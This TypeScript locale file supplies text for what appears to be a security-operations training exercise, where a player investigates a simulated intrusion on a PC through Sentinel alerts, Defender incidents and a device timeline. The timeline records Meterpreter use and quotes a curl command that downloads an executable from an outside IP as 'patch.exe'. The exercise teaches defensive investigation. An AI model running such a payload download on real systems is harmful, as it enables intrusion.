import type { LocaleContent, CardOrEntryLocaleContent } from "../../types";

/**
 * i18Next `entries:Episode01.Task02` lead text content
 */
const Task02Lead: LocaleContent = {
  header: "Investigate Amari in Sentinel & Defender",
  role: "Security Operations Analyst",
  time: "10-15m",
  brief: "How did this file get released? Start in Microsoft Sentinel. Investigate Amari's device and see what you can find out about the attack. <br><br>-Andrea",
};

/**
 * i18Next `entries:Episode01.Task02` entry content
 */
const Task02Entries: CardOrEntryLocaleContent = {
  SentinelLogSecurityAlertDetails: {
    heading: "Sentinel Log Security Alert Details",
    default: "Record details about the security event on Amari's PC",
    SentinelLogSecAlertTime: "TimeGenerated: 2021-10-29T23:31:39.959Z",
    SentinelLogSecAlertDisplayname: "DisplayName: Reflective dll loading detected",
    SentinelLogSecAlertLink: "AlertLink: https://security.microsoft.com/alerts/da637711…",
    SentinelLogSecAlertCompromisedEntity: "CompromisedEntity: pc105",
    SentinelLogSecVendorName: "Vendor Name: Microsoft",
    SentinelLogSecTenantID: "TenantId: 2de9d6df-9300-4ed8-8b9b-ad5163a660ec",
  },
  UnfamiliarSignInIncidentDetails: {
    heading: "Unfamiliar Sign In Incident Details",
    default: "Record details about this unfamiliar sign-in",
    UnfamSignInTime: "Creation time: 11/03/2021, 11:15 AM",
    UnfamSignInName: "Entity name: bfyoadmin",
    UnfamSignInIP: "Entity IP address: 68.226.28.109",
  },
  MultiStageIncidentDetails: {
    heading: "Multi-Stage Incident Details",
    default: "Record details about this multi-stage incident",
    MultiStageIncidentTime: "Creation time: 10/29/21, 04:26 PM",
    MultiStageIncidentEntity1: "Entity name: amari.rivera",
    MultiStageIncidentEntity2: "Entity name: pc105",
    MultiStageIncidentEntity3: "Entity name: patch.exe",
  },
  PasswordSprayIncident: {
    heading: "Password Spray Incident",
    default: "Record details about this password spray incident",
    PasswordSprayIncidentTime: "Creation time: 10/28/21, 06:44 AM",
    PasswordSprayIncidentEntity1: "Entity name: amari.rivera@bestforyouorganic.onmicrosoft.com",
    PasswordSprayIncidentEntity2: "Entity name: 199.249.230.167",
  },
  DefenderIncidentDetailsforEvidenceandResponse: {
    heading: "Defender Incident Details for Evidence and Response",
    default: "Record Defender details about a suspicious event on Amari's PC",
    DefenderEvidenceVerdict: "Verdict: Suspicious",
    DefenderEvidenceProcess: "Process name: patch.exe",
    DefenderEvidenceProcessID: "Process ID: 8836",
    DefenderEvidenceDevice: "Device: PC105",
  },
  DeviceTimelineResults: {
    heading: "Device Timeline Results",
    default: "Record details about events that occurred on Amari's PC",
    DeviceTimelineEventUpdatesXML: "Event: Microsoft_Office_Office Feature Updates.xml file observed on host",
    DeviceTimelineEventUpdatesXMLTime: "Event time: 11/2/2021, 11:16:06.246 AM",
    DeviceTimelineEventPatchRead: "Event: patch.exe read potentially valuable file ShoppingList.zip",
    DeviceTimelineEventPatchReadTime: "Event time: 10/29/2021, 4:18:28.036 PM",
    DeviceTimelineEventMaliciousPowerShell: "Event: A malicious PowerShell Cmdlet was invoked on the machine",
    DeviceTimelineEventMaliciousPowerShellTime: "Event time: 10/29/2021, 4:15:56.832 PM",
    DeviceTimelineEventMeterpreter: "Event: Meterpreter post-exploitation tool",
    DeviceTimelineEventMeterpreterTime: "Event time: 10/29/2021, 4:15:22.937 PM",
    DeviceTimelineEventPatchConnection443: "Event: patch.exe established a connection with 20.108.242.184:443",
    DeviceTimelineEventPatchConnection443Time: "Event time: 10/29/2021, 4:12:53.101 PM",
    DeviceTimelineEventCurlCreated: "Event: curl.exe created file patch.exe",
    DeviceTimelineEventCurlCreatedTime: "Event time: 10/29/2021, 4:09:18.523 PM",
    DeviceTimelineEventCurlCommand: "Command: 'curl http://20.108.242.184/name.exe -o patch.exe'",
  },
};

export default {
  ...Task02Lead,
  ...Task02Entries,
};
